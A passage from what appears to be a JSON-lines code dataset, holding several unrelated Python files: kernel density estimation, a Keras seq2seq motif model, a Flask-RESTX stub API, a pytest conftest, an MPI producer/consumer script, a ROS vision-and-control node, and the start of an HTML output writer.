np.zeros(np.shape(exponent))\n exp[exponent>-80] = 1/np.sqrt(2*np.pi)*np.exp(exponent[exponent>-80])\n y = 1/(n*h)*np.sum(exp, 0)\n elif self.kernel==\"epanechnikov\":\n k = np.zeros(np.shape(arg))\n k[np.abs(arg)<=1] = 3/4*(1-arg[np.abs(arg)<=1]**2)\n y = 1/(n*h)*np.sum(k, 0)\n else:\n print(\"(applyKernel) Select proper kernel!\")\n y = 0\n return y\n\n def plotDensityEstimation(self, data=None, h=None, plotInterval=[-100, 100], nop=1000, label=None):\n if data is None and self.data is not None:\n data = self.data\n elif data is None and self.data is None:\n print(\"(plotDensityEstimation) No proper data given.\")\n if h is None and self.h is not None:\n h = self.h\n elif h is None and self.h is None:\n print(\"(plotDensityEstimation) No proper bandwidth h is given.\")\n t = np.linspace(plotInterval[0], plotInterval[1], nop)\n f = self.applyKernel(x=t, data=data, h=h)\n if label is None:\n plt.figure()\n plt.plot(t, f)\n plt.title(\"Density estimation for h=\" + str(h))\n else:\n plt.plot(t, f, label=label)\n return t, f\n\n\n def evaluatePointDensity(self, x, h=None, data=None):\n if data is None and self.data is not None:\n data = self.data\n elif data is None and self.data is None:\n print(\"(plotDensityEstimation) No proper data given.\")\n if h is None and self.h is not None:\n h = self.h\n elif h is None and self.h is None:\n print(\"(plotDensityEstimation) No proper bandwidth h is given.\")\n y = self.applyKernel(x, data, h)\n return y\n\nif __name__ == '__main__':\n\n d = data(dim=1, nud=5)\n #d.plotData()\n trD, trL = d.genTrainingData(m=10000)\n teD, teL = d.genTestData(m=10)\n\n kde = kernelDensityEstimator(truncLvl=10, kernel=\"epanechnikov\")\n bw = 0.3\n pI = [-50, 50]\n nop = 10000\n d.plotUD(dim=0, classNr=0, label=\"UD for class 0\", plotInterval=pI, nop=nop)\n kde.plotDensityEstimation(data=trD[trL==-1], h=bw, label=\"kde class 0\", plotInterval=pI, nop=nop)\n kde.plotDensityEstimation(data=trD[trL==1], h=bw, label=\"kde class 1\", plotInterval=pI, nop=nop)\n d.plotUD(dim=0, classNr=1, label=\"UD for class 1\", plotInterval=pI, nop=nop)\n plt.legend()\n plt.show()\n","sub_path":"smolaClass/kernelDensityEstimation.py","file_name":"kernelDensityEstimation.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501076895","text":"# -*- coding: utf-8 -*-\n# @Time :4/2/19 8:49 PM\n# @Auther :Jason Lin\n# @File 
:test_new.py\n# @Software :PyCharm\nimport motif_encoder_decoder\nimport numpy as np\nfrom keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply, Reshape\nfrom keras.layers import RepeatVector, Dense, Activation, Lambda, Embedding\nimport pickle as pkl\nfrom attention_decoder import AttentionDecoder\nfrom position_embedding import PositionEmbedding\nfrom keras.models import Model\n\n\ndef load_sequence_data(family_name = \"bHLH_Homeo\"):\n if family_name == \"all\":\n seq_info = motif_encoder_decoder.motif_encoder.get_all_dimer()\n fname = seq_info[5]\n else:\n seq_info = motif_encoder_decoder.motif_encoder.get_sequence_family_input(family_name)\n # print(seq_info)\n motif1_seqs = seq_info[2]\n motif2_seqs = seq_info[3]\n dimer_seqs = seq_info[1]\n isRC_flags = seq_info[4]\n\n s_seqs = []\n t_seqs = []\n for i in range(len(dimer_seqs)):\n m = motif_encoder_decoder.motif_encoder(motif1_seq=motif1_seqs[i],\n motif2_seq=motif2_seqs[i], dimer_seq=dimer_seqs[i])\n source_sequence = m.motif_pair_code\n target_sequence = m.dimer_code\n # print(source_sequence.shape)\n # print(target_sequence.shape)\n s_seqs.append(source_sequence)\n t_seqs.append(target_sequence)\n\n s_seqs = np.array(s_seqs)\n t_seqs = np.array(t_seqs)\n # print(s_seqs.shape)\n # print(t_seqs.shape)\n if family_name == \"all\":\n return s_seqs, t_seqs, np.array(fname)\n return s_seqs, t_seqs\n\n\ndef encode_family_label(family_labels):\n import pickle as pkl\n fnames = pkl.load(open(\"./JiecongData/family_labels.pkl\", \"rb\"))\n label_code = []\n for l in family_labels:\n code = np.zeros(len(fnames))\n code[fnames == l] = 1\n label_code.append(code)\n label_code = np.array(label_code)\n return label_code\n\ndef seq2seq_model():\n Tx = 18 + 18 # Source sequence max length\n Ty = 31 + 2 # Target sequence max length\n source_dim = 4\n target_dim = 6\n\n source_seq = Input(shape=(Tx, source_dim))\n target_seq = Input(shape=(Ty, target_dim))\n\n\n encoder_output = Bidirectional(LSTM(32, return_sequences=True))(source_seq)\n print(encoder_output)\n bahdanau_attention_decoder = AttentionDecoder(50, Ty)\n decoder_output = bahdanau_attention_decoder([encoder_output, target_seq])\n model = Model(inputs=[source_seq, target_seq], outputs=[decoder_output])\n\n model.compile(\n loss='categorical_crossentropy',\n optimizer='adadelta')\n\n return model\n\n\ndef training_test():\n from sklearn.model_selection import KFold\n source_seqs, target_seqs, fnames = load_sequence_data(family_name=\"all\")\n kf = KFold(n_splits=10, random_state=66, shuffle=True)\n fold_dict = dict()\n fold_info_dict = dict()\n fold_id = 0\n family_labels = encode_family_label(fnames)\n\n\n\n for train_index, test_index in kf.split(source_seqs):\n print(\"-\" * 10, fold_id, \"-\" * 10)\n res_dist = []\n s_train = source_seqs[train_index]\n t_train = target_seqs[train_index]\n s_test = source_seqs[test_index]\n t_test = target_seqs[test_index]\n t_fname = fnames[test_index]\n\n model = seq2seq_model()\n model.fit([s_train, t_train], t_train, epochs=5)\n # fam_train = family_labels[train_index]\n # fam_test = family_labels[test_index]\n\ntraining_test()","sub_path":"test_new.py","file_name":"test_new.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"10281444","text":"##############server_path.py##############\r\n\r\nimport time\r\nimport logging\r\nimport argsparser\r\nfrom flask_restx import *\r\nfrom flask import *\r\n\r\nns = 
Namespace(\r\n\t'my_space', \r\n\tdescription='machine learning as a service',\r\n\t)\r\n\r\nargs = argsparser.prepare_args()\r\n\r\n#############\r\n\r\nchunking_parser = ns.parser()\r\nchunking_parser.add_argument('text', type=str, location='json')\r\n\r\nchunking_inputs = ns.model(\r\n\t'my_space', \r\n\t\t{\r\n\t\t\t'text': fields.String(example = u\"this is an input text\")\r\n\t\t}\r\n\t)\r\n\r\n@ns.route('/chunking')\r\nclass chunking_api(Resource):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper(chunking_api, self).__init__(*args, **kwargs)\r\n\t@ns.expect(chunking_inputs)\r\n\tdef post(self):\t\t\r\n\t\tstart = time.time()\r\n\t\ttry:\t\t\t\r\n\t\t\targs = chunking_parser.parse_args()\t\t\r\n\t\t\toutput = {}\r\n\t\t\toutput['chunks'] = [\r\n\t\t\t\t'chunck1', \r\n\t\t\t\t'chunck2',\r\n\t\t\t]\r\n\t\t\toutput['status'] = 'success'\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output, 200\r\n\t\texcept Exception as e:\r\n\t\t\toutput = {}\r\n\t\t\toutput['status'] = str(e)\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output\r\n\r\n#############\r\n\r\nextraction_parser = ns.parser()\r\nextraction_parser.add_argument('chunk', type=str, location='json')\r\n\r\nextraction_inputs = ns.model(\r\n\t'my_space', \r\n\t\t{\r\n\t\t\t'chunk': fields.String(example = u\"this is a chunk\")\r\n\t\t}\r\n\t)\r\n\r\n@ns.route('/extraction')\r\nclass extraction_api(Resource):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper(extraction_api, self).__init__(*args, **kwargs)\r\n\t@ns.expect(extraction_inputs)\r\n\tdef post(self):\t\t\r\n\t\tstart = time.time()\r\n\t\ttry:\t\t\t\r\n\t\t\targs = extraction_parser.parse_args()\t\t\r\n\t\t\toutput = {}\r\n\t\t\toutput['entities'] = [\r\n\t\t\t\t{'text':'entity1','score':0.97},\r\n\t\t\t\t{'text':'entity2','score':0.91},\r\n\t\t\t]\r\n\t\t\toutput['status'] = 'success'\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output, 200\r\n\t\texcept Exception as e:\r\n\t\t\toutput = {}\r\n\t\t\toutput['status'] = str(e)\r\n\t\t\toutput['running_time'] = float(time.time()- start)\r\n\t\t\treturn output\r\n\r\n##############server_path.py##############","sub_path":"server_path.py","file_name":"server_path.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"574919406","text":"#\n# Copyright (c) 2018 Netapp pvt ltd - All Rights Reserved\n#\n# Unauthorized copying of this file, via any medium is strictly prohibited\n# Proprietary and confidential\n#\n# This file is part of cbsTAS project\n#\n# Author: Gayathri Lokesh \n#\n\n# python imports\nimport os\nimport sys\nimport time\nfrom colors import blue\n\n# pytest imports\nimport pytest\nfrom _pytest.terminal import TerminalReporter\n#from _pytest.config import get_config\nfrom pluggy import HookspecMarker\nhookspec = HookspecMarker(\"pytest\")\n\n# cbsTAS imports\nfrom cbstas.cbstas_fw.core.cbstas_logger import get_logger, get_mod_logger, get_run_id, get_out_dir\nfrom cbstas.cbstas_fw.core.cbstas_init import gen_run_id, cbstas_fw_init\nfrom cbstas.cbstas_fw.core.testbed import get_all_duts_info\n\nlog = get_logger(__name__)\n\ndef pytest_addoption(parser):\n parser.addoption(\n '--basedir',\n action='store',\n dest='basedir',\n help='Base cbstas repo path')\n parser.addoption(\n '--testbed',\n action='store',\n dest='testbed',\n help='Testbed path - yml ')\n parser.addoption(\n '--outdir',\n action='store',\n dest='outdir',\n 
help='Dir for saving test run-logs of all types')\n\n\ndef pytest_configure(config):\n sys.path.append(config.option.basedir)\n from cbstas.cbstas_fw.cbstas_gdata import config as cfg\n global cfg\n config.option.importmode = 'append'\n config.option.self_contained_html = 'True'\n run_id = gen_run_id()\n if config.option.outdir != None:\n cfg._cfg_out_dir = config.option.outdir + '/RUN_' + run_id\n os.mkdir(cfg._cfg_out_dir)\n\n config.option.htmlpath = cfg._cfg_out_dir + '/run.html'\n config.option.xmlpath = cfg._cfg_out_dir + '/run.xml'\n config.option.log_file = cfg._cfg_out_dir + '/run.log'\n #config.option.confcutdir = config.option.basedir + '/cbstas/conftest.py'\n config.option.log_format = '[%(asctime)s], %(levelname)s, %(filename)s, %(funcName)s, %(lineno)d :: %(message)s'\n config.option.log_level = 'INFO'\n config.option.log_date_format = '%Y-%m-%d %H:%M:%S'\n config.option.log_file_format = '[%(asctime)s], %(levelname)s, %(filename)s, %(funcName)s, %(lineno)d :: %(message)s'\n config.option.log_file_level = 'DEBUG'\n config.option.log_file_date_format = '%Y-%m-%d %H:%M:%S'\n config.option.log_cli = True\n config.option.log_cli_format = '[%(asctime)s], %(levelname)s, %(filename)s, %(funcName)s, %(lineno)d :: %(message)s'\n# config.option.log_cli_level = 'DEBUG'\n# config.option.log_cli_level = 'INFO'\n config.option.log_cli_date_format = '%Y-%m-%d %H:%M:%S'\n\n\ndef pytest_report_header(config):\n st = '\\n===> LOG DIR : {0} \\n'.format(config.option.log_file)\n st += '===> HTML DIR : {0} \\n'.format(config.option.htmlpath)\n st += '===> XML DIR : {0} \\n'.format(config.option.xmlpath)\n return blue(st)\n\n\ndef pytest_runtest_setup(item):\n cfg._cfg_module = item.module.__name__\n mod_log = get_mod_logger(cfg._cfg_module)\n mod_log.info('{0}'.format('=' * 80))\n msg = 'STARTED : {0} '.format(item.name)\n mod_log.info('{0}'.format(msg.center(75, ' ')))\n mod_log.info('{0}'.format('=' * 80))\n\ndef pytest_unconfigure(config):\n \"\"\" called before test process is exited.\"\"\"\n if config.option.log_file:\n TerminalReporter(config).write('\\n')\n TerminalReporter(config).write_sep(\n '-', 'generated log file: ' + config.option.log_file)\n TerminalReporter(config).write('\\n\\n')\n\n@hookspec(firstresult=True)\ndef pytest_report_teststatus(report):\n \"\"\" return result-category, shortletter and verbose word for reporting.\n Stops at first non-None result, see :ref:`firstresult` \"\"\"\n report.toterminal\n\n\ndef pytest_terminal_summary(terminalreporter, exitstatus):\n \"\"\"Add a section to terminal summary reporting. 
TBD \"\"\"\n pass\n\n@pytest.fixture(scope='session')\ndef pre_test(request):\n \"\"\"\n Session/RUNID level configs/setup\n \"\"\"\n log.info('Executing Pre-test ')\n log.info('Initialize framework!!')\n\n input_dict = {}\n input_dict['iniconfig'] = request.config.option\n input_dict['dut_info'] = get_all_duts_info()\n input_dict['outdir'] = get_out_dir()\n input_dict['run_id'] = get_run_id()\n input_dict['basetemp'] = request.config.option.basedir\n input_dict['tb_path'] = request.config.option.testbed\n input_dict['user_lib'] = input_dict['basetemp'] + '/cbstas/userlib/'\n\n cbstas_fw_init(**input_dict)\n\n def post_test():\n \"\"\"\n Session level deconfig/cleanup/teardown\n \"\"\"\n log.info('Executing Post test')\n\n request.addfinalizer(post_test)\n","sub_path":"cbstas/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417814179","text":"from mpi4py import MPI\nfrom Client import Client\nfrom Producer import Producer\nfrom collections import deque\nimport time\nimport random\n\n\nif __name__ == '__main__':\n\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n size = comm.Get_size()\n time.sleep(1)\n\n if rank % 2 == 0:\n prod = Producer()\n for _ in range(6):\n prod.produce(1)\n prod.kill()\n else:\n cli = Client()\n for _ in range(6):\n cli.consume()\n cli.kill()\n \n print(\"loop ended\\n\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143322681","text":"#!/usr/bin/env python\n\nimport roslib\nimport sys\nimport rospy\nimport cv2\nimport numpy as np\nfrom math import cos\nfrom math import sin\nimport math\nfrom scipy.optimize import least_squares, minimize\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float64MultiArray, Float64\nfrom cv_bridge import CvBridge, CvBridgeError\n\n\nclass image_converter:\n\n # Defines publisher and subscriber\n def __init__(self):\n # initialize the node named image_processing\n rospy.init_node('image_processing', anonymous=True)\n # initialize a publisher to send images from camera2 to a topic named image_topic2\n self.image_pub2 = rospy.Publisher(\"image_topic2\",Image, queue_size = 1)\n # initialize a subscriber to recieve messages rom a topic named /robot/camera1/image_raw and use callback function to recieve data\n self.image_sub2 = rospy.Subscriber(\"/camera2/robot/image_raw\",Image,self.callback2)\n # initialize the bridge between openCV and ROS\n self.bridge = CvBridge()\n self.targetPrevious = [0.0, 0.0]\n self.centersYZ = []\n self.centers_YZ = rospy.Subscriber(\"centers_calculated\", Float64MultiArray, self.callbackProcessSub)\n self.centers3D = rospy.Publisher(\"centers_3D\", Float64MultiArray, queue_size = 10)\n self.joint_angles = rospy.Publisher(\"joint_angles\", Float64MultiArray, queue_size=10)\n\n self.yellowHistory = np.array([0, 0])\n self.blueHistory = np.array([0, 0])\n self.greenHistory = np.array([0, 0])\n self.redHistory = np.array([0, 0])\n\n self.joint1_curr = 0.0\n self.joint2_curr = 0.0\n self.joint3_curr = 0.0\n self.joint4_curr = 0.0\n\n self.target_pub = rospy.Publisher(\"target_pub\", Float64MultiArray, queue_size=10)\n self.end_eff_pub = rospy.Publisher(\"end_eff_pub\", Float64MultiArray, queue_size=10)\n\n self.controller_acc = rospy.Publisher(\"controller_acc\", Float64, queue_size=10)\n 
self.j_rank = rospy.Publisher(\"j_rank\", Float64, queue_size=10)\n\n self.joint1_sub = rospy.Subscriber(\"/robot/joint1_position_controller/command\",Float64,self.getJointAngle1Temp)\n self.joint2_sub = rospy.Subscriber(\"/robot/joint2_position_controller/command\",Float64,self.getJointAngle2Temp)\n self.joint3_sub = rospy.Subscriber(\"/robot/joint3_position_controller/command\",Float64,self.getJointAngle3Temp)\n self.joint4_sub = rospy.Subscriber(\"/robot/joint4_position_controller/command\",Float64,self.getJointAngle4Temp)\n\n self.firstRun = True\n\n # For robot closed control\n self.time_previous_step = np.array([rospy.get_time()], dtype='float64')\n self.error = np.array([0.0, 0.0, 0.0], dtype='float64')\n self.error_d = np.array([0.0, 0.0, 0.0], dtype='float64')\n\n self.robot_joint1_pub = rospy.Publisher(\"/robot/joint1_position_controller/command\", Float64, queue_size=10)\n self.robot_joint2_pub = rospy.Publisher(\"/robot/joint2_position_controller/command\", Float64, queue_size=10)\n self.robot_joint3_pub = rospy.Publisher(\"/robot/joint3_position_controller/command\", Float64, queue_size=10)\n self.robot_joint4_pub = rospy.Publisher(\"/robot/joint4_position_controller/command\", Float64, queue_size=10)\n\n def getJointAngle1Temp(self, data):\n self.joint1_curr = data.data\n\n def getJointAngle2Temp(self, data):\n self.joint2_curr = data.data\n\n def getJointAngle3Temp(self, data):\n self.joint3_curr = data.data\n\n def getJointAngle4Temp(self, data):\n self.joint4_curr = data.data\n\n def setJointAnglesInit(self, isFirstRun):\n if (isFirstRun):\n self.firstRun=False\n\n self.joint1 = Float64()\n self.joint1.data = 0.0\n self.joint2 = Float64()\n self.joint2.data = 0.0\n self.joint3 = Float64()\n self.joint3.data = 0.0\n self.joint4 = Float64()\n self.joint4.data = 0.0\n self.robot_joint1_pub.publish(self.joint1)\n self.robot_joint2_pub.publish(self.joint2)\n self.robot_joint3_pub.publish(self.joint3)\n self.robot_joint4_pub.publish(self.joint4)\n\n def callbackProcessSub(self, data):\n subscriberData = np.array(data.data)\n self.centersYZ = subscriberData[0:10]\n\n # Detecting the centre of the red circle\n def detect_red(self, image):\n # Isolate the blue colour in the image as a binary image\n mask = cv2.inRange(image, (0, 0, 100), (0, 0, 255))\n # This applies a dilate that makes the binary region larger (the more iterations the larger it becomes)\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n # Obtain the moments of the binary image\n M = cv2.moments(mask)\n # Calculate pixel coordinates for the centre of the blob\n if (M['m00'] == 0):\n return self.redHistory\n\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n self.redHistory = np.array([cx, cy])\n return self.redHistory\n\n # Detecting the centre of the green circle\n def detect_green(self, image):\n mask = cv2.inRange(image, (0, 100, 0), (0, 255, 0))\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n M = cv2.moments(mask)\n\n if (M['m00'] == 0):\n return self.greenHistory\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n self.greenHistory = np.array([cx, cy])\n return self.greenHistory\n\n # Detecting the centre of the blue circle\n def detect_blue(self, image):\n mask = cv2.inRange(image, (100, 0, 0), (255, 0, 0))\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n M = cv2.moments(mask)\n if (M['m00'] == 0):\n return self.blueHistory\n cx = int(M['m10'] / M['m00'])\n cy = 
int(M['m01'] / M['m00'])\n\n self.blueHistory = np.array([cx, cy])\n return self.blueHistory\n\n # Detecting the centre of the yellow circle\n def detect_yellow(self, image):\n mask = cv2.inRange(image, (0, 100, 100), (0, 255, 255))\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=3)\n M = cv2.moments(mask)\n if (M['m00'] == 0):\n return self.yellowHistory\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n self.yellowHistory = np.array([cx, cy])\n return self.yellowHistory\n\n # Detecting the centre of the target\n def detect_target(self, image, target_previous):\n a = self.pixel2meter(image)\n mask = cv2.inRange(image, (40, 100, 120), (100, 185, 220))\n im2 = cv2.imshow('window2', mask)\n cv2.waitKey(1)\n contours, hierarchy = cv2.findContours(mask, 1, 2)\n contoursSorted = []\n\n for cnt in contours:\n epsilon = 0.001 * cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, epsilon, True)\n\n if (len(approx) > 6):\n contoursSorted.append([cnt, len(approx)])\n\n if (len(contoursSorted) > 0):\n sortedContours = sorted(contoursSorted, key=lambda tup: tup[1], reverse=True)\n cnt = sortedContours[0][0]\n M = cv2.moments(cnt)\n if (M['m00'] == 0):\n return target_previous\n\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n cv2.drawContours(image, [cnt], -1, (0, 255, 0), 1)\n cv2.circle(image, (cx, cy), 1, (255, 255, 255), -1)\n cv2.imshow(\"Image\", image)\n cv2.imwrite('image11.png', image)\n cv2.waitKey(1)\n\n posRelative = np.array([(cx - self.detect_yellow(image)[0]), (self.detect_yellow(image)[1] - cy)])\n target_previous[0] = (a * posRelative[0])\n target_previous[1] = (a * posRelative[1])\n\n return (target_previous)\n\n # Calculate the conversion from pixel to meter\n def pixel2meter(self, image):\n # Obtain the centre of each coloured blob\n circle1Pos = self.detect_yellow(image)\n circle2Pos = self.detect_blue(image)\n # find the distance between two circles\n dist = np.sum((circle1Pos - circle2Pos) ** 2)\n return 2 / np.sqrt(dist)\n\n def convertCenters3D(self, image, target_previous):\n a = self.pixel2meter(image)\n yellowXZ = self.detect_yellow(image)\n blueXZ = self.detect_blue(image)\n greenXZ = self.detect_green(image)\n redXZ = self.detect_red(image)\n targetXZ = self.detect_target(image, target_previous)\n\n yellowCenter = np.array([0, 0, 0])\n blueCenter = a * np.array([(blueXZ[0] - yellowXZ[0]), (self.centersYZ[2] - self.centersYZ[0]), (yellowXZ[1] - blueXZ[1])])\n greenCenter = a * np.array([(greenXZ[0] - yellowXZ[0]), (self.centersYZ[4] - self.centersYZ[0]), (yellowXZ[1] - greenXZ[1])])\n redCenter = a * np.array([(redXZ[0] - yellowXZ[0]), (self.centersYZ[6] - self.centersYZ[0]), (yellowXZ[1] - redXZ[1])])\n targetCenter = np.array([targetXZ[0], self.centersYZ[8], targetXZ[1]])\n return np.array([yellowCenter, blueCenter, greenCenter, redCenter, targetCenter])\n\n def errorFunction(self, theta, coordinatesFound):\n q1 = theta[0]\n q2 = theta[1]\n q3 = theta[2]\n q4 = theta[3]\n\n c1 = math.cos(q1 + math.pi / 2)\n c2 = math.cos(q2 + math.pi / 2)\n c3 = math.cos(q3)\n c4 = math.cos(q4)\n\n s1 = math.sin(q1 + math.pi / 2)\n s2 = math.sin(q2 + math.pi / 2)\n s3 = math.sin(q3)\n s4 = math.sin(q4)\n\n transformation_03 = np.array([[3*s1*s3 + 3*c1*c2*c3], [3*c2*c3*s1 - 3*c1*s3], [3*c3*s2 + 2]])\n transformation_04 = np.array([[3*s1*s3 + 2*c4*(s1*s3 + c1*c2*c3) + 3*c1*c2*c3 - 2*c1*s2*s4], [3*c2*c3*s1 - 2*c4*(c1*s3 - c2*c3*s1) - 3*c1*s3 - 2*s1*s2*s4], [3*c3*s2 + 2*c2*s4 + 2*c3*c4*s2 + 2]])\n\n red_coords = 
np.array([[coordinatesFound[9], coordinatesFound[10], coordinatesFound[11]]])\n green_coords = np.array([[coordinatesFound[6], coordinatesFound[7], coordinatesFound[8]]])\n blue_coords = np.array([[coordinatesFound[3], coordinatesFound[4], coordinatesFound[5]]])\n\n return np.sum(((transformation_03 - green_coords)) + ((transformation_04 - red_coords)) + (([0,0,2] - blue_coords)))\n\n def detect_joint_angles(self, _):\n return np.array([self.joint1_curr,self.joint2_curr,self.joint3_curr,self.joint4_curr])\n\n def detect_joint_anglesX(self, coordinatesFound):\n solution = least_squares(self.errorFunction, x0=[0, 0, 0, 0], args = [coordinatesFound], bounds=(0,1))\n if(solution.success == False):\n print(\"Joint Angles not found\")\n return solution.x\n\n def forward_kinematics(self, joint_angles):\n q1 = joint_angles[0]\n q2 = joint_angles[1]\n q3 = joint_angles[2]\n q4 = joint_angles[3]\n\n c1 = math.cos(q1 + math.pi / 2)\n c2 = math.cos(q2 + math.pi / 2)\n c3 = math.cos(q3)\n c4 = math.cos(q4)\n\n s1 = math.sin(q1 + math.pi / 2)\n s2 = math.sin(q2 + math.pi / 2)\n s3 = math.sin(q3)\n s4 = math.sin(q4)\n\n return np.array([[3*s1*s3 + 2*c4*(s1*s3 + c1*c2*c3) + 3*c1*c2*c3 - 2*c1*s2*s4], [3*c2*c3*s1 - 2*c4*(c1*s3 - c2*c3*s1) - 3*c1*s3 - 2*s1*s2*s4], [ 3*c3*s2 + 2*c2*s4 + 2*c3*c4*s2 + 2]])\n\n def calculate_jacobian(self, joint_angles):\n q1 = joint_angles[0]\n q2 = joint_angles[1]\n q3 = joint_angles[2]\n q4 = joint_angles[3]\n\n c1 = math.cos(q1 + math.pi / 2)\n c2 = math.cos(q2 + math.pi / 2)\n c3 = math.cos(q3)\n c4 = math.cos(q4)\n\n s1 = math.sin(q1 + math.pi / 2)\n s2 = math.sin(q2 + math.pi / 2)\n s3 = math.sin(q3)\n s4 = math.sin(q4)\n\n dk1 = np.array([((2 * s2 * s4 - 2 * c2 * c3 * c4 - 3 * c2 * c3) * s1 + (2 * s3 * c4 + 3 * s3) * c1),\n (-1 * c1 * ((2 * c3 * c4 + 3 * c3) * s2 + 2 * s4 * c2)),\n (-1 * (2 * c4 + 3) * (c1 * c2 * s3 - s1 * c3)),\n (-2 * ((s1 * s3 + c1 * c2 * c3) * s4 + c1 * s2 * c4))])\n dk2 = np.array([((2 * s3 * c4 + 3 * s3) * s1 + (-2 * s2 * s4 + 2 * c2 * c3 * c4 + 3 * c2 * c3) * c1),\n (-1 * s1 * ((2 * c3 * c4 + 3 * c3) * s2 + 2 * s4 * c2)),\n (-1 * (2 * c4 + 3) * (s1 * c2 * s3 + c1 * c3)),\n (2 * ((c1 * s3 - s1 * c2 * c3) * s4 - s1 * s2 * c4))])\n dk3 = np.array([(0), ((2 * c3 * c4 + 3 * c3) * c2 - 2 * s4 * s2), (-1 * s2 * (2 * c4 + 3) * s3),\n (-2 * (s2 * c3 * s4 - c2 * c4))])\n\n jacobian = np.array([dk1, dk2, dk3])\n self.jacobian_rank = np.linalg.matrix_rank(jacobian)\n\n return np.array([dk1, dk2, dk3])\n\n def control_closed(self):\n # Proportional gain\n K_p = np.array([[0.15, 0, 0], [0, 0.15, 0], [0, 0, 0.15]])\n # Derivative gain\n K_d = np.array([[0.2, 0, 0], [0, 0.2, 0], [0, 0, 0.2]])\n # Time step estimate\n cur_time = np.array([rospy.get_time()])\n dt = cur_time - self.time_previous_step\n self.time_previous_step = cur_time\n # Robot end-effector position\n end_eff_pos = self.coordS[9:12]\n # Target position\n target_pos = self.coordS[12:15]\n self.error_g = ((target_pos - end_eff_pos) - self.error) / dt\n # Error Estimation\n self.error = target_pos - end_eff_pos\n config_state = self.detect_joint_angles(self.coordS)\n Jac_inv = np.linalg.pinv(self.calculate_jacobian(config_state)) # (psudeo inverse)\n contr_inp = np.dot(Jac_inv, (np.dot(K_d, self.error_g.transpose()) + np.dot(K_p, self.error.transpose())))\n ang_posi = config_state + (dt * contr_inp)\n return ang_posi\n\n # Recieve data, process it, and publish\n def callback2(self,data):\n # Recieve the image\n try:\n self.cv_image2 = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError 
as e:\n print(e)\n\n\n im2=cv2.imshow('window2', self.cv_image2)\n cv2.waitKey(1)\n\n self.coordS = self.convertCenters3D(self.cv_image2, self.targetPrevious).flatten()\n targetCenter = Float64MultiArray()\n targetCenter.data = self.coordS\n\n self.setJointAnglesInit(self.firstRun)\n\n\n jointAngles = Float64MultiArray()\n jointAngles.data = self.detect_joint_anglesX(self.coordS)\n\n jointAnglesActual = Float64MultiArray()\n jointAnglesActual.data = self.detect_joint_angles(self.coordS)\n\n end_eff_coords = Float64MultiArray()\n end_eff_coords.data = self.coordS[9:12]\n\n target_coords = Float64MultiArray()\n target_coords.data = self.coordS[12:15]\n\n acc = Float64()\n acc.data = np.sum(np.abs(np.subtract(self.coordS[9:12], self.coordS[12:15])))\n\n\n q_d = self.control_closed()\n self.joint1 = Float64()\n self.joint1.data = q_d[0]\n self.joint2 = Float64()\n self.joint2.data = q_d[1]\n self.joint3 = Float64()\n self.joint3.data = q_d[2]\n self.joint4 = Float64()\n self.joint4.data = q_d[3]\n\n jac_rank = Float64()\n jac_rank.data = self.jacobian_rank\n\n # Publish the results\n try:\n self.image_pub2.publish(self.bridge.cv2_to_imgmsg(self.cv_image2, \"bgr8\"))\n self.joint_angles.publish(jointAngles)\n\n self.centers3D.publish(targetCenter)\n\n self.robot_joint1_pub.publish(self.joint1)\n self.robot_joint2_pub.publish(self.joint2)\n self.robot_joint3_pub.publish(self.joint3)\n self.robot_joint4_pub.publish(self.joint4)\n\n self.end_eff_pub.publish(end_eff_coords)\n self.target_pub.publish(target_coords)\n self.controller_acc.publish(acc)\n self.j_rank.publish(jac_rank)\n\n except CvBridgeError as e:\n print(e)\n\n# call the class\ndef main(args):\n ic = image_converter()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\n# run the code if the node is called\nif __name__ == '__main__':\n main(sys.argv)\n\n\n","sub_path":"src/image2.py","file_name":"image2.py","file_ext":"py","file_size_in_byte":15071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"486937369","text":"class HtmlOutputer:\n def __init__(self):\n self.datas = []\n\n def collect_data(self, data): # 收集爬取到的数据\n if data is None:\n return\n self.datas.append(data)\n\n def output_html(self): # 将爬取到的数据写到本地\n with open('log/output.html', 'w', encoding='utf-8') as f:\n f.write(\"\")\n f.write(\" \")\n f.write(\"\")\n f.write(\"\")\n\n count = 1\n print('datas-->',self.datas)\n for data in self.datas:\n print('data-->', data)\n f.write(\"\")\n # f.write(\"\" % str(data['url'].encode('utf-8'), 'utf-8'))\n # 